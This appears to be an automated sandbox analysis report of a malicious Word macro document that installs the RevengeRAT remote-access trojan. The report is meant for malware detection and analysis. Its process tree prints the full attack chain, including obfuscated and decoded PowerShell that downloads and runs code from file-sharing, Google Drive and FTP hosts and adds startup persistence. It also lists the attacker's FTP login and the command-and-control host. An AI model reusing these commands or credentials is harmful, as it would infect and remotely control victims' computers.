Analysis
-
max time kernel
138s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240730-en -
resource tags
-
submitted
02-08-2024 02:03
General
-
Target
861375605b6f4b622556d5b04f6329440a26b38dfa066b114c55d258ac4895bc.docm
-
Size
109KB
-
MD5
639df28efc7717655b1d8cc618a76b1c
-
SHA1
9e79c9d82ad07f95b09e73bbba792a889911f51e
-
SHA256
861375605b6f4b622556d5b04f6329440a26b38dfa066b114c55d258ac4895bc
-
SHA512
62fdd2c3b2da4481c4cb380e01a37c67f7005e5024cef3b960883b227b659e056680152d2d72002a1496e293e7f97a47d3a67f8ab890b63209a00f19862a3d6c
-
SSDEEP
1536:vkc1B8Tf5nq7gPgP8MDw/jlQx1JE7vReOr0l77CXXNaHsdUXSIt98iuB/xDC:vV2ClwH9r0l77AnsSmy/B/xDC
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Extracted
Protocol: ftp- Host:
ftp.desckvbrat.com.br - Port:
21 - Username:
desckvbrat1 - Password:
developerpro21578Jp@@
Extracted
revengerat
NyanCatRevenge
marcelotatuape.ddns.net:333
3e042ee793c84
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
Blocklisted process makes network request 9 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\861375605b6f4b622556d5b04f6329440a26b38dfa066b114c55d258ac4895bc.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/rgZiV9iE/8r-wKti0.d13d81b1839707719820361a64160ba8 -o test.js; explorer.exe test.js2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" test.js3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $vCHvw = 'J⅕BS⅕H⅕⅕RwBK⅕GI⅕I⅕⅕9⅕C⅕⅕J⅕Bo⅕G8⅕cwB0⅕C4⅕VgBl⅕HI⅕cwBp⅕G8⅕bg⅕u⅕E0⅕YQBq⅕G8⅕cg⅕u⅕EU⅕cQB1⅕GE⅕b⅕Bz⅕Cg⅕Mg⅕p⅕Ds⅕SQBm⅕C⅕⅕K⅕⅕k⅕FI⅕c⅕BH⅕Eo⅕Yg⅕p⅕C⅕⅕ew⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕SQBP⅕C4⅕U⅕Bh⅕HQ⅕a⅕Bd⅕Do⅕OgBH⅕GU⅕d⅕BU⅕GU⅕bQBw⅕F⅕⅕YQB0⅕Gg⅕K⅕⅕p⅕Ds⅕Z⅕Bl⅕Gw⅕I⅕⅕o⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕Ow⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕n⅕Gg⅕d⅕B0⅕H⅕⅕cw⅕6⅕C8⅕LwBk⅕HI⅕aQB2⅕GU⅕LgBn⅕G8⅕bwBn⅕Gw⅕ZQ⅕u⅕GM⅕bwBt⅕C8⅕dQBj⅕D8⅕ZQB4⅕H⅕⅕bwBy⅕HQ⅕PQBk⅕G8⅕dwBu⅕Gw⅕bwBh⅕GQ⅕JgBp⅕GQ⅕PQ⅕n⅕Ds⅕J⅕BI⅕FQ⅕WQBm⅕HY⅕I⅕⅕9⅕C⅕⅕J⅕Bl⅕G4⅕dg⅕6⅕F⅕⅕UgBP⅕EM⅕RQBT⅕FM⅕TwBS⅕F8⅕QQBS⅕EM⅕S⅕BJ⅕FQ⅕RQBD⅕FQ⅕VQBS⅕EU⅕LgBD⅕G8⅕bgB0⅕GE⅕aQBu⅕HM⅕K⅕⅕n⅕DY⅕N⅕⅕n⅕Ck⅕OwBp⅕GY⅕I⅕⅕o⅕CQ⅕S⅕BU⅕Fk⅕ZgB2⅕Ck⅕I⅕B7⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕PQ⅕g⅕Cg⅕J⅕Bo⅕FM⅕QQBI⅕H⅕⅕I⅕⅕r⅕C⅕⅕JwBX⅕DE⅕MQ⅕y⅕EE⅕Z⅕BQ⅕GY⅕SQ⅕w⅕F⅕⅕Qw⅕3⅕Gg⅕YgBz⅕GM⅕aQBf⅕DU⅕Xw⅕w⅕F8⅕ZQBV⅕Dc⅕TgB3⅕E0⅕WgBo⅕GY⅕N⅕B4⅕Cc⅕KQ⅕g⅕Ds⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ew⅕k⅕Gg⅕UwBB⅕Eg⅕c⅕⅕g⅕D0⅕I⅕⅕o⅕CQ⅕a⅕BT⅕EE⅕S⅕Bw⅕C⅕⅕Kw⅕g⅕Cc⅕MQBi⅕HI⅕ag⅕1⅕Go⅕cQBu⅕HE⅕UgB4⅕EM⅕R⅕⅕2⅕FY⅕a⅕Bm⅕Gg⅕QQBu⅕DI⅕cgBj⅕FY⅕ZgBz⅕FI⅕bw⅕3⅕EQ⅕O⅕Bn⅕HI⅕Jw⅕p⅕C⅕⅕OwB9⅕Ds⅕J⅕Bm⅕Hc⅕UwBZ⅕H⅕⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕C⅕⅕Ow⅕k⅕GY⅕dwBT⅕Fk⅕c⅕⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BG⅕Gk⅕b⅕Bl⅕Cg⅕J⅕BV⅕FI⅕T⅕BL⅕EI⅕L⅕⅕g⅕CQ⅕c⅕Bh⅕HM⅕d⅕Bh⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BV⅕H⅕⅕dwBp⅕G4⅕LgBt⅕HM⅕dQ⅕n⅕Ck⅕I⅕⅕7⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕PQ⅕g⅕Cg⅕JwBD⅕Do⅕X⅕BV⅕HM⅕ZQBy⅕HM⅕X⅕⅕n⅕C⅕⅕Kw⅕g⅕Fs⅕RQBu⅕HY⅕aQBy⅕G8⅕bgBt⅕GU⅕bgB0⅕F0⅕Og⅕6⅕FU⅕cwBl⅕HI⅕TgBh⅕G0⅕ZQ⅕g⅕Ck⅕Ow⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕9⅕C⅕⅕K⅕⅕k⅕H⅕⅕YQBz⅕HQ⅕YQ⅕g⅕Cs⅕I⅕⅕n⅕Fw⅕VQBw⅕Hc⅕aQBu⅕C4⅕bQBz⅕HU⅕Jw⅕p⅕Ds⅕I⅕Bw⅕G8⅕dwBl⅕HI⅕cwBo⅕GU⅕b⅕Bs⅕C4⅕ZQB4⅕GU⅕I⅕B3⅕HU⅕cwBh⅕C4⅕ZQB4⅕GU⅕I⅕⅕k⅕GY⅕aQBs⅕GU⅕I⅕⅕v⅕HE⅕dQBp⅕GU⅕d⅕⅕g⅕C8⅕bgBv⅕HI⅕ZQBz⅕HQ⅕YQBy⅕HQ⅕I⅕⅕7⅕C⅕⅕QwBv⅕H⅕⅕eQ⅕t⅕Ek⅕d⅕Bl⅕G0⅕I⅕⅕n⅕CU⅕R⅕BD⅕F⅕⅕SgBV⅕CU⅕Jw⅕g⅕C0⅕R⅕Bl⅕HM⅕d⅕Bp⅕G4⅕YQB0⅕Gk⅕bwBu⅕C⅕⅕K⅕⅕g⅕CQ⅕RgBv⅕Gw⅕Z⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕C⅕⅕Kw⅕g⅕Cc⅕X⅕BB⅕H⅕⅕c⅕BE⅕GE⅕d⅕Bh⅕Fw⅕UgBv⅕GE⅕bQBp⅕G4⅕ZwBc⅕E0⅕aQBj⅕HI⅕bwBz⅕G8⅕ZgB0⅕Fw⅕VwBp⅕G4⅕Z⅕Bv⅕Hc⅕cwBc⅕FM⅕d⅕Bh⅕HI⅕d⅕⅕g⅕E0⅕ZQBu⅕HU⅕X⅕BQ⅕HI⅕bwBn⅕HI⅕YQBt⅕HM⅕X⅕BT⅕HQ⅕YQBy⅕HQ⅕dQBw⅕Cc⅕I⅕⅕p⅕C⅕⅕LQBm⅕G8⅕cgBj⅕GU⅕I⅕⅕7⅕H⅕⅕bwB3⅕GU⅕cgBz⅕Gg⅕ZQBs⅕Gw⅕LgBl⅕Hg⅕ZQ⅕g⅕C0⅕YwBv⅕G0⅕bQBh⅕G4⅕Z⅕⅕g⅕Cc⅕cwBs⅕GU⅕ZQBw⅕C⅕⅕MQ⅕4⅕D⅕⅕Jw⅕7⅕C⅕⅕cwBo⅕HU⅕d⅕Bk⅕G8⅕dwBu⅕C4⅕ZQB4⅕GU⅕I⅕⅕v⅕HI⅕I⅕⅕v⅕HQ⅕I⅕⅕w⅕C⅕⅕LwBm⅕C⅕⅕fQBl⅕Gw⅕cwBl⅕C⅕⅕ewBb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBT⅕GU⅕cgB2⅕Gk⅕YwBl⅕F⅕⅕bwBp⅕G4⅕d⅕BN⅕GE⅕bgBh⅕Gc⅕ZQBy⅕F0⅕Og⅕6⅕FM⅕ZQBy⅕HY⅕ZQBy⅕EM⅕ZQBy⅕HQ⅕aQBm⅕Gk⅕YwBh⅕HQ⅕ZQBW⅕GE⅕b⅕Bp⅕GQ⅕YQB0⅕Gk⅕bwBu⅕EM⅕YQBs⅕Gw⅕YgBh⅕GM⅕aw⅕g⅕D0⅕I⅕B7⅕CQ⅕d⅕By⅕HU⅕ZQB9⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕E4⅕ZQB0⅕C4⅕UwBl⅕HI⅕dgBp⅕GM⅕ZQBQ⅕G8⅕aQBu⅕HQ⅕TQBh⅕G4⅕YQBn⅕GU⅕cgBd⅕Do⅕OgBT⅕GU⅕YwB1⅕HI⅕aQB0⅕Hk⅕U⅕By⅕G8⅕d⅕Bv⅕GM⅕bwBs⅕C⅕⅕PQ⅕g⅕Fs⅕UwB5⅕HM⅕d⅕Bl⅕G0⅕LgBO⅕GU⅕d⅕⅕u⅕FM⅕ZQBj⅕HU⅕cgBp⅕HQ⅕eQBQ⅕HI⅕bwB0⅕G8⅕YwBv⅕Gw⅕V⅕B5⅕H⅕⅕ZQBd⅕Do⅕OgBU⅕Gw⅕cw⅕x⅕DI⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕g⅕D0⅕I⅕⅕o⅕E4⅕ZQB3⅕C0⅕TwBi⅕Go⅕ZQBj⅕HQ⅕I⅕BO⅕GU⅕d⅕⅕u⅕Fc⅕ZQBi⅕EM⅕b⅕Bp⅕GU⅕bgB0⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕Zw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕V⅕Bl⅕Hg⅕d⅕⅕u⅕EU⅕bgBj⅕G8⅕Z⅕Bp⅕G4⅕ZwBd⅕Do⅕OgBV⅕FQ⅕Rg⅕4⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBD⅕HI⅕ZQBk⅕GU⅕bgB0⅕Gk⅕YQBs⅕HM⅕I⅕⅕9⅕C⅕⅕bgBl⅕Hc⅕LQBv⅕GI⅕agBl⅕GM⅕d⅕⅕g⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕TgBl⅕HQ⅕LgBO⅕GU⅕d⅕B3⅕G8⅕cgBr⅕EM⅕cgBl⅕GQ⅕ZQBu⅕HQ⅕aQBh⅕Gw⅕K⅕⅕n⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕MQ⅕n⅕Cw⅕JwBk⅕GU⅕dgBl⅕Gw⅕bwBw⅕GU⅕cgBw⅕HI⅕bw⅕y⅕DE⅕NQ⅕3⅕Dg⅕SgBw⅕E⅕⅕Q⅕⅕n⅕Ck⅕Ow⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕D0⅕I⅕⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕EQ⅕bwB3⅕G4⅕b⅕Bv⅕GE⅕Z⅕BT⅕HQ⅕cgBp⅕G4⅕Zw⅕o⅕C⅕⅕JwBm⅕HQ⅕c⅕⅕6⅕C8⅕LwBk⅕GU⅕cwBj⅕Gs⅕dgBi⅕HI⅕YQB0⅕DE⅕Q⅕Bm⅕HQ⅕c⅕⅕u⅕GQ⅕ZQBz⅕GM⅕awB2⅕GI⅕cgBh⅕HQ⅕LgBj⅕G8⅕bQ⅕u⅕GI⅕cg⅕v⅕FU⅕c⅕Bj⅕HI⅕eQBw⅕HQ⅕ZQBy⅕C8⅕M⅕⅕y⅕C8⅕R⅕BM⅕Ew⅕M⅕⅕x⅕C4⅕d⅕B4⅕HQ⅕Jw⅕g⅕Ck⅕Ow⅕k⅕Hc⅕VgBQ⅕Gw⅕dQ⅕u⅕GQ⅕aQBz⅕H⅕⅕bwBz⅕GU⅕K⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕I⅕⅕9⅕C⅕⅕K⅕BO⅕GU⅕dw⅕t⅕E8⅕YgBq⅕GU⅕YwB0⅕C⅕⅕TgBl⅕HQ⅕LgBX⅕GU⅕YgBD⅕Gw⅕aQBl⅕G4⅕d⅕⅕p⅕Ds⅕J⅕B3⅕FY⅕U⅕Bs⅕HU⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕I⅕⅕9⅕C⅕⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕FQ⅕ZQB4⅕HQ⅕LgBF⅕G4⅕YwBv⅕GQ⅕aQBu⅕Gc⅕XQ⅕6⅕Do⅕VQBU⅕EY⅕O⅕⅕7⅕CQ⅕TQBX⅕GY⅕dQBh⅕C⅕⅕PQ⅕g⅕CQ⅕dwBW⅕F⅕⅕b⅕B1⅕C4⅕R⅕Bv⅕Hc⅕bgBs⅕G8⅕YQBk⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕g⅕Ck⅕OwBb⅕EI⅕eQB0⅕GU⅕WwBd⅕F0⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕D0⅕I⅕Bb⅕FM⅕eQBz⅕HQ⅕ZQBt⅕C4⅕QwBv⅕G4⅕dgBl⅕HI⅕d⅕Bd⅕Do⅕OgBG⅕HI⅕bwBt⅕EI⅕YQBz⅕GU⅕Ng⅕0⅕FM⅕d⅕By⅕Gk⅕bgBn⅕Cg⅕I⅕⅕k⅕E0⅕VwBm⅕HU⅕YQ⅕u⅕FI⅕ZQBw⅕Gw⅕YQBj⅕GU⅕K⅕⅕g⅕Cc⅕kyE6⅕JMhJw⅕g⅕Cw⅕I⅕⅕n⅕EE⅕Jw⅕g⅕Ck⅕I⅕⅕p⅕Ds⅕WwBT⅕Hk⅕cwB0⅕GU⅕bQ⅕u⅕EE⅕c⅕Bw⅕EQ⅕bwBt⅕GE⅕aQBu⅕F0⅕Og⅕6⅕EM⅕dQBy⅕HI⅕ZQBu⅕HQ⅕R⅕Bv⅕G0⅕YQBp⅕G4⅕LgBM⅕G8⅕YQBk⅕Cg⅕I⅕⅕k⅕FI⅕W⅕Bp⅕FY⅕agBf⅕Fk⅕b⅕B0⅕Eg⅕Sw⅕g⅕Ck⅕LgBH⅕GU⅕d⅕BU⅕Hk⅕c⅕Bl⅕Cg⅕I⅕⅕n⅕EM⅕b⅕Bh⅕HM⅕cwBM⅕Gk⅕YgBy⅕GE⅕cgB5⅕DM⅕LgBD⅕Gw⅕YQBz⅕HM⅕MQ⅕n⅕C⅕⅕KQ⅕u⅕Ec⅕ZQB0⅕E0⅕ZQB0⅕Gg⅕bwBk⅕Cg⅕I⅕⅕n⅕H⅕⅕cgBG⅕FY⅕SQ⅕n⅕C⅕⅕KQ⅕u⅕Ek⅕bgB2⅕G8⅕awBl⅕Cg⅕J⅕Bu⅕HU⅕b⅕Bs⅕Cw⅕I⅕Bb⅕G8⅕YgBq⅕GU⅕YwB0⅕Fs⅕XQBd⅕C⅕⅕K⅕⅕g⅕Cc⅕Mg⅕y⅕CU⅕OQ⅕3⅕D⅕⅕MwBj⅕GY⅕N⅕⅕0⅕GI⅕Z⅕⅕z⅕DU⅕YQ⅕1⅕GM⅕N⅕⅕3⅕DQ⅕Ng⅕y⅕GI⅕NwBi⅕GU⅕O⅕⅕y⅕Dk⅕O⅕⅕x⅕DI⅕Zg⅕2⅕DI⅕Mg⅕l⅕D0⅕dg⅕m⅕GQ⅕YQBv⅕Gw⅕bgB3⅕G8⅕Z⅕⅕9⅕GU⅕YwBy⅕HU⅕bwBz⅕CY⅕d⅕B4⅕HQ⅕Lg⅕0⅕DI⅕M⅕⅕y⅕C4⅕Nw⅕w⅕C4⅕M⅕⅕z⅕Dc⅕Mg⅕l⅕Dc⅕Mg⅕l⅕Dg⅕LQBG⅕FQ⅕VQBE⅕DM⅕JQBB⅕DI⅕JQBl⅕G0⅕YQBu⅕GU⅕b⅕Bp⅕GY⅕KwBC⅕DM⅕JQ⅕y⅕DI⅕JQB0⅕Hg⅕d⅕⅕u⅕DQ⅕Mg⅕w⅕DI⅕Lg⅕3⅕D⅕⅕Lg⅕w⅕DM⅕Mg⅕y⅕CU⅕R⅕⅕z⅕CU⅕ZQBt⅕GE⅕bgBl⅕Gw⅕aQBm⅕Cs⅕Qg⅕z⅕CU⅕d⅕Bu⅕GU⅕bQBo⅕GM⅕YQB0⅕HQ⅕YQ⅕9⅕G4⅕bwBp⅕HQ⅕aQBz⅕G8⅕c⅕Bz⅕Gk⅕Z⅕⅕t⅕HQ⅕bgBl⅕HQ⅕bgBv⅕GM⅕LQBl⅕HM⅕bgBv⅕H⅕⅕cwBl⅕HI⅕PwB0⅕Hg⅕d⅕⅕u⅕GU⅕N⅕⅕1⅕DM⅕N⅕⅕y⅕DQ⅕Mg⅕3⅕Dk⅕O⅕⅕1⅕C0⅕NQBl⅕Dc⅕OQ⅕t⅕GY⅕Yw⅕2⅕DQ⅕LQ⅕0⅕DU⅕N⅕⅕4⅕C0⅕M⅕⅕5⅕Dc⅕ZgBh⅕D⅕⅕NQ⅕1⅕C8⅕bwBR⅕E8⅕MgBM⅕HU⅕M⅕Bv⅕C8⅕cwBt⅕GU⅕d⅕Bp⅕C8⅕bQBv⅕GM⅕LgB0⅕Gg⅕ZwBp⅕Ho⅕LgBu⅕GQ⅕Yw⅕u⅕D⅕⅕bg⅕u⅕DE⅕cgB0⅕C4⅕NwBw⅕C8⅕Lw⅕6⅕HM⅕c⅕B0⅕HQ⅕a⅕⅕n⅕C⅕⅕L⅕⅕g⅕Cc⅕JQBE⅕EM⅕U⅕BK⅕FU⅕JQ⅕n⅕Cw⅕I⅕⅕n⅕FQ⅕cgB1⅕GU⅕MQ⅕n⅕C⅕⅕KQ⅕g⅕Ck⅕OwB9⅕Ds⅕';$vCHvw = $vCHvw.replace('⅕','A') ;$vCHvw = [System.Convert]::FromBase64String( $vCHvw ) ;;;$vCHvw = [System.Text.Encoding]::Unicode.GetString( $vCHvw ) ;$vCHvw = $vCHvw.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js') ;powershell $vCHvw3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$RpGJb = $host.Version.Major.Equals(2);If ($RpGJb) {$pasta = [System.IO.Path]::GetTempPath();del ($pasta + '\Upwin.msu');$hSAHp = 'https://drive.google.com/uc?export=download&id=';$HTYfv = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ($HTYfv) {$hSAHp = ($hSAHp + 'W112AdPfI0PC7hbsci_5_0_eU7NwMZhf4x') ;}else {$hSAHp = ($hSAHp + '1brj5jqnqRxCD6VhfhAn2rcVfsRo7D8gr') ;};$fwSYp = (New-Object Net.WebClient) ;$fwSYp.Encoding = [System.Text.Encoding]::UTF8 ;$fwSYp.DownloadFile($URLKB, $pasta + '\Upwin.msu') ;$FoldStartup = ('C:\Users\' + [Environment]::UserName );$file = ($pasta + '\Upwin.msu'); powershell.exe wusa.exe $file /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.js' -Destination ( $FoldStartup + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$wVPlu.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$MWfua = $wVPlu.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$wVPlu.dispose();$wVPlu = (New-Object Net.WebClient);$wVPlu.Encoding = [System.Text.Encoding]::UTF8;$MWfua = $wVPlu.DownloadString( $MWfua );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $MWfua.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '22%9703cf44bd35a5c47462b7be829812f622%=v&daolnwod=ecruos&txt.4202.70.0372%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.70.0322%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.e45342427985-5e79-fc64-4548-097fa055/oQO2Lu0o/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'True1' ) );};"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft SyS\\x2.ps1"5⤵
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\LocalLow\Daft SyS\skowf.ps1"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"5⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
132KB
MD5c48ca9208d2d72f7c4aadc4552c4371c
SHA1009a66081262d0e7ac6d9654f4d19ffe8f7b9965
SHA256488da21024f08719000d1c44b00bf74fa4343eb1cccffb786efac08cba079fd5
SHA512404b0062421b807cace5d4ab37b8379373045fe57bb3a020b98484b56adc1096c929319194f190edba247959a8dce7c6097b393d6a811e75941ff586e9ac71e0
-
Filesize
313B
MD580cc1e9c5788aa32935547805c78f1cf
SHA1e31f8d4102408d01ac1b1fda23d9c8d26104f90f
SHA2560bc10b9ab8808a6918d887094f418c68d48e5e26b4ad0f7144967f567033c84f
SHA512e68eb58226c4fc013ecbc64c092ba0941c99e1731f9a973805591bede7edc4e33aa1f820163da4a159434d831d9c218e791773a8cc231e7f0dc9c83cf4169a21
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD553cbd2da07930d380c4e2c2ca9d44587
SHA1d3e56b90c74a05b3bae9aeb3491281b7c5c144e7
SHA2563e569b6e77c987ba5b5483c83168358b7c4c2277a46dc7cd59af7c56a40d2253
SHA5129476048d43d5569a7698ae1d4f9ad836839f10ffd0242bd0b6ebed8a30392a2e2042ee16a61269cfdad118107c3cbb9fd9deb4f05e9ee37b339d958f3de0a43b
-
Filesize
64B
MD55387258bc776353faff8aa820a1ad8b9
SHA1b20032fc6f28f044a54400ff6f05edf28456601e
SHA256fa6097f092dbbbf5b6655ad85b4bdbf427db7359430f846ad1795ee0fe94c9f9
SHA512116fcf0fee9d2b38e01f9b33b8e956c48997e60fb8a41a05314eaabd864f61962907ee231d8860cbaab3f5ad5fa6018036c53f77814cc950613ac46b2ed03e3c
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
12KB
MD54e37cf7563ad5ebcde8bfcb51a515c48
SHA1b9f758dd64b60da7da2f01b680d45abaf854f41e
SHA256f198a3e52894fe22bdb0b4e42347a624157b60f501ea48816bb75911c3e38331
